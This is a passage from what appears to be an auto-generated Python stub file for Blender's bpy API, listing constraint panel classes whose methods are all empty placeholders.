def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bKinematicConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bLocLimitConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bLocateLikeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bLockTrackConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bMinMaxConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bObjectSolverConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bPivotConstraint(ObjectConstraintPanel, ConstraintButtonsPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bPythonConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bRotLimitConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bRotateLikeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
